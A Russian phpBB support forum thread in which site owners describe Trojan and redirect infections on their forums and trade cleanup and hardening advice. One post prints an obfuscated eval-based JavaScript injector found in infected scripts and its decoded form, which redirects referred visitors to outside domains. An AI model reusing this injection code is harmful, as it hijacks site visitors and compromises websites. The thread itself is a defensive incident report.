Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 17 лет 6 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
Юрий5
phpBB 1.4.1
Сообщения: 45
Стаж: 13 лет
Откуда: Киев
Благодарил (а): 7 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Юрий5 »

Всем привет. Появилась проблема схожая с другими. :!:
В общем делал следующие правки по темах:
http://www.phpbb-work.ru/vistraivaem-ka ... d-t14.html и Images across in attachment
Суть выстроить картинки в ряд, правки были файлов были: attachment.html, stylesheet.css, ббкоде.html
Желаемого результата не добился, залил назад файлы старые +обновил шаблоны. И тут началось интересное..

Сбоку появился белый фон, вместо привычных голубых синих "полосок"
Изображение
Потом в коде обнаружил этот код, думал Гугл что то чудит, но временно убрав гугл приблуды с кода (Гугл+, аналитикс) желаемого результата не дали.
В ручную просмотрел файлы index.php и index_body.html, но ничего там подозрительного не нашел.
Где рыть? База? Хостер?

Код: Выделить всё

<iframe name="oauth2relay826583877" id="oauth2relay826583877" src="https://accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Falpinisty.net#rpctoken=535250538&forcesecure=1" tabindex="-1" style="width: 1px; height: 1px; position: absolute; top: -100px;"></iframe> <div class="highslide-container" style="padding: 0px; border: none; margin: 0px; position: absolute; left: 0px; top: 0px; width: 100%; z-index: 1001; direction: ltr;"><a class="highslide-loading" title="Нажать для выхода" href="javascript:;" style="position: absolute; top: -9999px; opacity: 0.75; z-index: 1;">Загрузка...</a><div style="display: none;"></div><div class="highslide-viewport highslide-viewport-size" style="padding: 0px; border: none
Аватара пользователя
Юрий5
phpBB 1.4.1
Сообщения: 45
Стаж: 13 лет
Откуда: Киев
Благодарил (а): 7 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Юрий5 »

P.s. Перезалил файлы через фтп, результата не добился никакого. :(
San4
phpBB 1.0.0
Сообщения: 9
Стаж: 8 лет 11 месяцев
Благодарил (а): 9 раз
Поблагодарили: 1 раз

Re: Как убить Трояна?

Сообщение San4 »

del. it
hsabarab
phpBB 1.0.0
Сообщения: 5
Стаж: 7 лет 11 месяцев

Re: Как убить Трояна?

Сообщение hsabarab »

Всем привет. Начиналось всё отлично! Взял в аренду сервер, поставил систему и давай продвигать свой форум. И попался вот такой сайт
Скрытый текст
autoprogon.com
Бесплатный прогон сайта по каталогам! Я следовал инструкции! После прогона, как и следовало ожидать, позиция сайта не изменилась. И буквально через месяц я случайно заметил что при переходе по внешним ссылкам на мой форум сразу перекидывает на другую страницу. И адрес этой страницы постоянно меняется.
Скрытый текст
clikunder.ru
Установил чистый форум, поменял пароли! Помогло! И вот недавно опять вылезла эта дрянь!
Я давай копать глубже! Скачиваю копию форума на комп и давай рыть. Сканировал антивирем чисто. Давай смотреть по дате последнего изменения и вот ЕВРИКА! Нашел! Были заражены все скрипты вот пример одного из кодов
код 
(function () {
var a = "(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/br1}0)(;",
b = "fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/0uB,0})",
c = "utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:q./'20})",
d = "";
for (var i = 0; i < a.length; i++)
d += a.charAt(i) + b.charAt(i) + c.charAt(i);
eval(d);
}
());
(function () {
var a = "(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",
b = "fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",
c = "utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",
d = "";
for (var i = 0; i < a.length; i++)
d += a.charAt(i) + b.charAt(i) + c.charAt(i);
evaleval(decrypt(encrypted)); ;
}
());
После расшифровки получил такую картину
Код 2 
(function () {
function c(x) {
if (x.substr(0, 8) == 'https://')
x = x.substr(8);
if (x.substr(0, 7) == 'http://')
x = x.substr(7);
if (x.substr(0, 4) == 'www.')
x = x.substr(4);
if (x.indexOf('/') != -1)
x = x.split('/')[0];
if (x.indexOf('?') != -1)
x = x.split('?')[0];
return x
}
var host = c(window.location.hostname),
ref = c(document.referrer),
co = document.cookie,
ident = '_y_m_=off',
D = new Date();
D.setDate(D.getDate() + 20);
document.cookie = ident + ';path=/;expires=' + D;
if (ref != '' && ref != host && co.indexOf(ident) == -1) {
setInterval(function () {
window.location.href = 'http://qb0.ru/1B'
}, 2000)
}
}
());
(function () {
function c(x) {
if (x.substr(0, 8) == 'https://')
x = x.substr(8);
if (x.substr(0, 7) == 'http://')
x = x.substr(7);
if (x.substr(0, 4) == 'www.')
x = x.substr(4);
if (x.indexOf('/') != -1)
x = x.split('/')[0];
if (x.indexOf('?') != -1)
x = x.split('?')[0];
return x
}
var host = c(window.location.hostname),
ref = c(document.referrer),
co = document.cookie,
ident = '_y_m_=off',
D = new Date();
D.setDate(D.getDate() + 20);
document.cookie = ident + ';path=/;expires=' + D;
if (ref != '' && ref != host && co.indexOf(ident) == -1) {
setInterval(function () {
window.location.href = 'http://02o.org/1a'
}, 2000)
}
}
());
Удалил вредоносный код во всех файлах и заработало но не на долго.
Следующий его ход(хакера) был сделан в сторону мода Advanced BBCode Box. Удалил мод и почистил базу с помощью STK.
Дальнейшие мои были действия это установил права на файлы и папки(запретил запись), отключил галерею и загрузку аватар из админки а на папки поставил права только чтение(было предположение что оттуда запускался шел), поменял снова пароли на все(форум, БД, админка на сервере, ФТП ), на файл config.php выставил права 400.
Пока всё чисто! тьфу.. тьфу..

Какие еще варианты или способы есть обезопасить себя от хакеров? И как его наказать или вычислить?
Аватара пользователя
apollion
phpBB 2.0.22
Сообщения: 1382
Стаж: 10 лет
Откуда: Юг Руси
Благодарил (а): 50 раз
Поблагодарили: 99 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение apollion »

Запретите сохранение паролей в программе, через которую вы заходите на FTP.

Отправлено спустя 1 минуту 30 секунд:
hsabarab писал(а): Бесплатный прогон сайта по каталогам!
А вот этого не нужно было делать. От этого только минус.
Последний раз редактировалось apollion 16.04.2016 19:03, всего редактировалось 1 раз.
hsabarab
phpBB 1.0.0
Сообщения: 5
Стаж: 7 лет 11 месяцев

Re: Как убить Трояна?

Сообщение hsabarab »

Спасибо. Уже сделал.
Аватара пользователя
Gubkin
phpBB 2.0.16
Сообщения: 1085
Стаж: 8 лет 8 месяцев
Благодарил (а): 231 раз
Поблагодарили: 107 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Gubkin »

что за фигня, переодически всплывает окно такое в касперском фри
как оказалось IP это мой форум ))
Вложения
2018-10-27_181101.jpg
Ещё один тупой вопрос и будете забанены. К гуру надо приходить подготовленными, а не как Вы. Вчера создали форум с парой постов, а сегодня уже 20 вопросов )))
Аватара пользователя
ronim
Модератор
Модератор
Сообщения: 912
Стаж: 6 лет 2 месяца
Откуда: Таллин ,Эстония
Благодарил (а): 165 раз
Поблагодарили: 160 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение ronim »

Gubkinмой антивирус ( g-data) ни как не реагирует на твой форум.
Хотя по по проверке сайтов весьма вредный
Если ты не видишь проблем на форуме , но это не значить что их там нет
Аватара пользователя
Gubkin
phpBB 2.0.16
Сообщения: 1085
Стаж: 8 лет 8 месяцев
Благодарил (а): 231 раз
Поблагодарили: 107 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Gubkin »

проверил свой комп на вирусы, dr.web cureit нашел модифицированный hosts
восстановил
пока таких сообщений не вижу )
Ещё один тупой вопрос и будете забанены. К гуру надо приходить подготовленными, а не как Вы. Вчера создали форум с парой постов, а сегодня уже 20 вопросов )))
Аватара пользователя
apollion
phpBB 2.0.22
Сообщения: 1382
Стаж: 10 лет
Откуда: Юг Руси
Благодарил (а): 50 раз
Поблагодарили: 99 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение apollion »

hosts тут врядли виноват. У меня тоже модифицирован, но не трояном, а лично мной. Что это у вас там за src.js?

Отправлено спустя 2 минуты 24 секунды:
Яндекс с Гуглем не нашли на вашем форуме вирусов при последней проверке. Яндекс лишь написал, что у вас клей с www.
Аватара пользователя
Gubkin
phpBB 2.0.16
Сообщения: 1085
Стаж: 8 лет 8 месяцев
Благодарил (а): 231 раз
Поблагодарили: 107 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Gubkin »

apollion писал(а): 28.10.2018 4:11 Что это у вас там за src.js?
нет такого файла на форуме
не понимаю что там браузер пытается открыть
Ещё один тупой вопрос и будете забанены. К гуру надо приходить подготовленными, а не как Вы. Вчера создали форум с парой постов, а сегодня уже 20 вопросов )))
Аватара пользователя
apollion
phpBB 2.0.22
Сообщения: 1382
Стаж: 10 лет
Откуда: Юг Руси
Благодарил (а): 50 раз
Поблагодарили: 99 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение apollion »

Ну, для самоуспокоения вы можете:
- проверить файлы форума на вирусы онлайн - была ссылка на сервис, но я не найду
- проверить Айболитом

Кстати, если у вас выделенный айпишник форума - добавление записи в hosts ускорит загрузку форума в браузере. Но это необязательно.
Аватара пользователя
Pazh
Former team member
Сообщения: 2317
Стаж: 14 лет 4 месяца
Благодарил (а): 43 раза
Поблагодарили: 506 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Pazh »

phpMussel - никто не пробовал что за зверь и есть ли успехи по сравнению например с ai-bolit?
Помощь в ЛС/email только за WM или ЮMoney
Аватара пользователя
Zemius
phpBB 1.4.2
Сообщения: 57
Стаж: 13 лет 9 месяцев
Откуда: Москва, Томск
Благодарил (а): 21 раз
Контактная информация:

Вирус? Cтала возникать реклама на весь экран!

Сообщение Zemius »

Версия phpbb 3.1.12. Стала возникать реклама на весь экран! Через где то 20 переходов на страницы форума. Похоже что зацепился какой то вирус или троян. Проверка на вирусы ничего не дало. Беглый просмотр времени изменения файлов на сервере не показал наличия изменений. Подскажите что ещё можно сделать?

Отправлено спустя 11 минут 53 секунды:
Реклама вылетает при любом переходе по ссылке на форуме (при серфинге по форуму).
Да ещё.. При этом при переходи со страницы на страницу стал моргать экран со сменой кодировки. Происходит это быстро и не сразу на это обращаешь внимание. Я записал видео и вырезал нужный кадр. Выглядит это примерно так:
смена кодировки.jpg
Аватара пользователя
Pazh
Former team member
Сообщения: 2317
Стаж: 14 лет 4 месяца
Благодарил (а): 43 раза
Поблагодарили: 506 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Pazh »

Zemius, это не вирус, а кривой css, который возвращает сервер или закешировался в браузере (более вероятно, т.к. для гостя показывает все нормально)
Помощь в ЛС/email только за WM или ЮMoney
Ответить

Вернуться в «phpBB-пространство»